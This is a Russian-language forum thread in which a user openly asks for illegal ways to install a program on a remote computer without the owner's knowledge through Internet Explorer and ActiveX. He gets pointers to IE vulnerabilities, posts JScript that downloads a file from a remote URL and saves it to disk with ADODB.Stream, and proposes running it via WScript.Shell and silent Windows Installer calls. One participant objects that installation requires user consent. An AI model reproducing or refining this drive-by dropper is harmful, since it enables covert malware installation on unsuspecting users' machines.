Internet Explorer и ActiveX

Очень хочется сделать так, чтобы самопальные ActiveX отображались на странице безо всяких запросов юзеру на тему содержания в небезопасных элементов.

Может кто знает как это сделать?

 

1. Реализовать IObjectSafety.
2. Подправить настройки IE.

 

подписать валидным сертификатом? (это, правда, обойдется долларов в 600 )

 

На компе клиента?

А как изменить содержимое реестра у клиента? Если это возможно, то в Инете можно делать Такие Обалденные Вещи }

 

И ещё вопрос: Как реализуются на веб-страницах такие вещи, как Визуальный HTML редактор в CMP или Расширенный редактор сообщений в EMAIL?

 

opennetworks
Тебе легальные пути? Тогда 1 либо подпись сертификатом. А по второму вопросу, разные пути есть - ActiveX, стандартный DHTML, JS + AJAX. У MS компонент есть, DHTML Editor вроде называется.

 

Не, мне не легальные, plz.

Надо прогу на удалённый комп пихнуть так, чтобы там об этом не узнали.

 

сколько троянописателей мучаются таким вопросом =)
смотри последнии уязвимости в IE. security.nnvo.ru, secirtylab.ru

 

Уязвимости это хорошо...

А писать такие программы законно?

Ведь я не причиняю вреда пользователю.

Просто хочу заменить кое-какие файлы у клиента

 

Нет. Легальная установка софта - с извещением о том, что софт будет установлен, и с возможностями отказаться от установки и удалить после установленное.

Докажи это пользователю.

 

.... А CGI умеет с клиентской Файловой Системой общаться?

Имеется в виду взять с сервера файл и поместить его на комп юзверю.

Или ещё вариант: Есть ли в виндах такие AX, которые умели бы работать с сетью (Windows Installer не в счёт - он хоть и ничё не спрашивает, но устанавливает софт в систему, выдавая ProgressBar.)?

 

Я, кажется, ответил на свой вопрос!

Поменяв настройки Windows Installer, можно установить на удалённый комп службу с типом stDevice без запроса

Код такой:

из MSI.dll берём функции:

Вот некоторые:

WindowsInstaller.installer.InstallProduct
-//-patch
-//-configure

Все эти функции доступны средствами JavaScript и VBScript.

 

Code (Text):

1. var req = new ActiveXObject("Microsoft.XMLHTTP.1.0");
2. req.open("POST","http://...",false);
3. req.send();
4.  
5. WScript.sleep(2000);   
6.  
7. var oStream = new ActiveXObject("Adodb.Stream");
8. oStream.type = 1;
9. oStream.open();
10. oStream.write(req.responseBody);
11. oStream.saveToFile("...")
12. oStream.close();

 

А потом запустить сохранённый файл через wscript.shell?


У home edition XP глюк есть:

на всех остальных виндах WindowsInstaller запускается с показом Progress, а если стоит архивысокий уровень безопасности, то с запросом (по дефолту - без него), а у WinXPHe прогресс показывается на стадии "Завершение установки".

По - русски это так выглядит:

"Ну всё, какое-то содержимое из Инета я установил. Вот, полюбуйся!"


--------------

А в какой dll лежит Microsoft.XMLHTTP.1.0?

Хочу посмотреть все его свойства и методы.

 

HKEY_CLASSES_ROOT\CLSID\{ED8C108E-4349-11D2-91A4-00C04F7969E8}